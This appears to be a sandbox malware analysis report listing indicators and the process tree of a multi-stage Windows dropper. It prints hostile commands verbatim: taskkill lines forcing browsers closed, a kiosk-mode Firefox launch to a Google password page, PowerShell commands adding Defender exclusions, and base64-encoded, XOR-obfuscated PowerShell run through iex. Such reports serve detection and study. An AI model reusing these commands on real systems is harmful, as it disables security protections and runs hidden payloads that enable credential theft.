Token: SeDebugPrivilege	6996	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	6456	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	6652	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeIncreaseQuotaPrivilege	4100	powershell.exe
Token: SeSecurityPrivilege	4100	powershell.exe
Token: SeTakeOwnershipPrivilege	4100	powershell.exe
Token: SeLoadDriverPrivilege	4100	powershell.exe
Token: SeSystemProfilePrivilege	4100	powershell.exe
Token: SeSystemtimePrivilege	4100	powershell.exe
Token: SeProfSingleProcessPrivilege	4100	powershell.exe
Token: SeIncBasePriorityPrivilege	4100	powershell.exe
Token: SeCreatePagefilePrivilege	4100	powershell.exe
Token: SeBackupPrivilege	4100	powershell.exe
Token: SeRestorePrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeSystemEnvironmentPrivilege	4100	powershell.exe
Token: SeRemoteShutdownPrivilege	4100	powershell.exe
Token: SeUndockPrivilege	4100	powershell.exe
Token: SeManageVolumePrivilege	4100	powershell.exe
Token: 33	4100	powershell.exe
Token: 34	4100	powershell.exe
Token: 35	4100	powershell.exe
Token: 36	4100	powershell.exe
Token: SeIncreaseQuotaPrivilege	4100	powershell.exe
Token: SeSecurityPrivilege	4100	powershell.exe
Token: SeTakeOwnershipPrivilege	4100	powershell.exe
Token: SeLoadDriverPrivilege	4100	powershell.exe
Token: SeSystemProfilePrivilege	4100	powershell.exe
Token: SeSystemtimePrivilege	4100	powershell.exe
Token: SeProfSingleProcessPrivilege	4100	powershell.exe
Token: SeIncBasePriorityPrivilege	4100	powershell.exe
Token: SeCreatePagefilePrivilege	4100	powershell.exe
Token: SeBackupPrivilege	4100	powershell.exe
Token: SeRestorePrivilege	4100	powershell.exe
Token: SeShutdownPrivilege	4100	powershell.exe
Token: SeDebugPrivilege	4100	powershell.exe
Token: SeSystemEnvironmentPrivilege	4100	powershell.exe
Token: SeRemoteShutdownPrivilege	4100	powershell.exe
Token: SeUndockPrivilege	4100	powershell.exe
Token: SeManageVolumePrivilege	4100	powershell.exe
Token: 33	4100	powershell.exe
Token: 34	4100	powershell.exe
Token: 35	4100	powershell.exe
Token: 36	4100	powershell.exe
Token: SeIncreaseQuotaPrivilege	4100	powershell.exe
Token: SeSecurityPrivilege	4100	powershell.exe
Token: SeTakeOwnershipPrivilege	4100	powershell.exe
Token: SeLoadDriverPrivilege	4100	powershell.exe
Token: SeSystemProfilePrivilege	4100	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
5136	chrome.exe
4864	msedge.exe
4864	msedge.exe
4864	msedge.exe
4864	msedge.exe
4864	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
992	firefox.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe
4160	9dd5ebb048.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
992	firefox.exe
6604	HmngBpR.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 680 wrote to memory of 4992	680	3257a90914b6dfdb338969b2a58a260a.exe	83
PID 680 wrote to memory of 4992	680	3257a90914b6dfdb338969b2a58a260a.exe	83
PID 680 wrote to memory of 4992	680	3257a90914b6dfdb338969b2a58a260a.exe	83
PID 4992 wrote to memory of 1080	4992	A7B94.exe	85
PID 4992 wrote to memory of 1080	4992	A7B94.exe	85
PID 4992 wrote to memory of 1080	4992	A7B94.exe	85
PID 1080 wrote to memory of 4368	1080	1E08u3.exe	88
PID 1080 wrote to memory of 4368	1080	1E08u3.exe	88
PID 1080 wrote to memory of 4368	1080	1E08u3.exe	88
PID 4992 wrote to memory of 3132	4992	A7B94.exe	89
PID 4992 wrote to memory of 3132	4992	A7B94.exe	89
PID 4992 wrote to memory of 3132	4992	A7B94.exe	89
PID 3132 wrote to memory of 2460	3132	2R0700.exe	95
PID 3132 wrote to memory of 2460	3132	2R0700.exe	95
PID 3132 wrote to memory of 2460	3132	2R0700.exe	95
PID 680 wrote to memory of 776	680	3257a90914b6dfdb338969b2a58a260a.exe	96
PID 680 wrote to memory of 776	680	3257a90914b6dfdb338969b2a58a260a.exe	96
PID 680 wrote to memory of 776	680	3257a90914b6dfdb338969b2a58a260a.exe	96
PID 4368 wrote to memory of 2576	4368	rapes.exe	99
PID 4368 wrote to memory of 2576	4368	rapes.exe	99
PID 4368 wrote to memory of 2576	4368	rapes.exe	99
PID 4368 wrote to memory of 4836	4368	rapes.exe	100
PID 4368 wrote to memory of 4836	4368	rapes.exe	100
PID 4368 wrote to memory of 4836	4368	rapes.exe	100
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 4368 wrote to memory of 3508	4368	rapes.exe	102
PID 4368 wrote to memory of 3508	4368	rapes.exe	102
PID 4368 wrote to memory of 3508	4368	rapes.exe	102
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 2576 wrote to memory of 4872	2576	a26361a646.exe	101
PID 4368 wrote to memory of 856	4368	rapes.exe	104
PID 4368 wrote to memory of 856	4368	rapes.exe	104
PID 4368 wrote to memory of 856	4368	rapes.exe	104
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 856 wrote to memory of 3452	856	7be4314deb.exe	106
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4836 wrote to memory of 3512	4836	ebcf281f33.exe	105
PID 4368 wrote to memory of 536	4368	rapes.exe	119
PID 4368 wrote to memory of 536	4368	rapes.exe	119
PID 4368 wrote to memory of 536	4368	rapes.exe	119
PID 4368 wrote to memory of 228	4368	rapes.exe	120
PID 4368 wrote to memory of 228	4368	rapes.exe	120

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe
"C:\Users\Admin\AppData\Local\Temp\3257a90914b6dfdb338969b2a58a260a.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:680
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\A7B94.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4992
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1E08u3.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Adds Run key to start application
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4368
    - - C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126610101\a26361a646.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2576
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126620101\ebcf281f33.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4836
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        6⤵
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        
        PID:3512
    - - C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126630101\f2f8df5acc.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3508
    - - C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:856
      - C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126640101\7be4314deb.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3452
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 972
        6⤵
        Program crash
        
        PID:3044
    - - C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126650101\07a3928e11.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:536
      - C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8CKO89S7RFEHT4LV2KHUEN5.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1136
    - - C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126660101\f266eb5780.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:228
    - - C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126670101\9dd5ebb048.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:4160
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2460
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5004
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4004
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:4216
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:992
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 27276 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ea04936-7d02-47be-a5ca-5e8a25e972ad} 992 "\\.\pipe\gecko-crash-server-pipe.992" gpu
        8⤵
        
        PID:4964
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2476 -parentBuildID 20240401114208 -prefsHandle 2468 -prefMapHandle 2464 -prefsLen 28196 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0ad6503-ac51-4fec-b3d5-9bfbe6c9d56e} 992 "\\.\pipe\gecko-crash-server-pipe.992" socket
        8⤵
        
        PID:2804
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 2876 -prefMapHandle 3156 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d5b7b62-f4ff-4e7f-93f6-994d602b1041} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
        8⤵
        
        PID:4220
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3708 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3696 -prefsLen 32686 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c3d632b-4ce6-4c01-bb1b-e3835adf9ff8} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
        8⤵
        
        PID:4476
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4884 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4876 -prefMapHandle 4776 -prefsLen 32686 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {908de87b-9050-428e-8751-76fe08ace0b6} 992 "\\.\pipe\gecko-crash-server-pipe.992" utility
        8⤵
        Checks processor information in registry
        
        PID:6928
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 3 -isForBrowser -prefsHandle 4736 -prefMapHandle 4732 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37e3119c-5aa7-453e-b292-24319f17915e} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
        8⤵
        
        PID:5568
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5480 -childID 4 -isForBrowser -prefsHandle 5632 -prefMapHandle 5636 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b1e2a7a-3959-4c27-a84a-b189cc88357a} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
        8⤵
        
        PID:5580
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5824 -childID 5 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27226 -prefMapSize 244658 -jsInitHandle 1300 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {22634b4c-89d8-4704-ab6a-10a63fbd5ce1} 992 "\\.\pipe\gecko-crash-server-pipe.992" tab
        8⤵
        
        PID:5592
    - - C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126680101\0876cf74dd.exe"
        5⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6648
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6712
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10126691121\skf7iF4.cmd" sgcCUaUFtA
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:6948
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6996
        
        C:\Windows\SysWOW64\findstr.exe
        
        "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4636
    - - C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10126700101\PQkVDtx.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Enumerates system info in registry
        
        PID:5528
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\runtime'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
      - C:\Program Files\runtime\COM Surrogate.exe
        
        "C:\Program Files\runtime\COM Surrogate.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:6384
        
        C:\Windows\system32\net.exe
        
        "net" session
        7⤵
        
        PID:4196
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        8⤵
        
        PID:4032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -EncodedCommand JABpAGcAdQBsAHkAaAA9ACcATQBIAFoAOABYAGwAWQB2AFkARgBrAHYARABEADgAbQBQAEgAZAA0AFQARgBZADQAYwAxAG8AWQBkAHgARQA4AEIAaQB0AGcAVwBXADgAVwBTAFYANAB6AEIAMABRAFMAQgBpAGgASwBCADEAYwBXAFoAMQBnAGUAQQBRADAAZwBCAG4AWgAvAFUAWAA4ADQAQQBHAGsAWQBkAGsAUQBrAFAAQgBJAGIAWABYAHcARQBkADAAWQBnAEIAMABRAGUAQgBnAE4AcwBUADIAOABXAGEAMABFAFoASwBTAE0AbABQAEgAZAA3AFUAWABrAFUAWgB4AGsAagBkAGcAMQBoAEIAbgBkAEMAUQBGAGMAdABjADAAVQBlAEEAeABJADMATAB6AHgASwBjAG4AbwB0AFMAWABzAFoAZABpAE0AcABCAG4AUgBXAGQARwA4AEcAQQBGADAAWQBMAFIAWQArAEwAegB4AHYAUQBtAE0AcwBaADEAUQBqAEwAVABjAEQAQQBSAEkAYgBkAEYAWQA0AGMARgBrAHMAZABoAGsAbABQAHcASQBYAEIAVwBCAHkAWQB4AGcAWQBBAHkAQQAzAE4AZwBKAEMAWABXADgARwBaADEAZwA9ACcAOwAkAG4AZgBwAHYAawB1AD0AJwBlAEUALgA2ADUAQQAxAC0AegBEAHUAUAAnADsAJAB4AHEAbgB2AGkAcwA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABpAGcAdQBsAHkAaAApADsAJAB0AHYAYwBhAGYAYwBoAHUAPQAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAKABmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAdAAgACQAeABxAG4AdgBpAHMALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAeABxAG4AdgBpAHMAWwAkAGkAXQAtAGIAeABvAHIAWwBiAHkAdABlAF0AJABuAGYAcAB2AGsAdQBbACQAaQAlACQAbgBmAHAAdgBrAHUALgBMAGUAbgBnAHQAaABdAH0AKQApACkAOwBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAdAB2AGMAYQBmAGMAaAB1ACkAKQB8AGkAZQB4AA==
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:6456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -EncodedCommand JABlAHIAZwBuAD0AJwBFAFUAQQAvAFUARABBAC8ARABrAEEAVQBEAEcAYwBZAEgAVQBFADcAUQBqAEEAbwBIAFUATQBqAGQAMABrAEMASgB4ADAAagBWAHcAawBHAEoAMABjAEkAQgB4AHcAcwBKAHgANABKAEMAVABFAEcAQwBVAEUAbABBAFYAVQBlAEoAMABBADgAWAB4AGsAbwBiAG4AQQBqAGQAaAB3AGEASABTAFIAWQBVAHgAbwBVAEcAVgA4AGIAQgB4AHcAZwBKAHoAVQB2AFEAUQBrAEcAQgBWAGcAaQBLAFgAcwBiAEgAVQBFADQAWAB4ADgARQBDAFEAQQBZAGQAbABWAGYASgAwAEUAQgBUAGoARQA5AEgAVgB3AGwAQQAwAG8ASgBEAGcAbwBKAGYAQgB3ADkASgAyAEkAaQBkAG4AcwBYAEoAMABJAFYAZQBnAGsAVwBiAGsAUQBqAEsARgBVAHMASgB6AHMAdgBmAFEAbwBKAEQAVgB3AFoAQQBWAFUAWQBIAFUARQByAFMAdwBzAFgASABWAHcAWQBkAGwAawBHAEgAawBFADcAUQBoAGsAbwBQAEYAbwBJAEIAeAB3ADUASABpAHMAbgBVAFIAbwBYAEYAUQBVAGoATAAyAHMAVQBEAFQAQgBjAFkARABJAEcAYQBsADgAagBkADAAawA2AEkARABzAEIAUwB3AGsAQwBIAFgAMABnAEUAMwA4AEYASABpAFIAWgBCAFEAPQA9ACcAOwAkAHEAbwBrAGwAZABwAD0AJwBEAHMAbQA4AFMAUQBfADQAQQBEAC0AbgAnADsAJAB1AGYAZABkAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAcg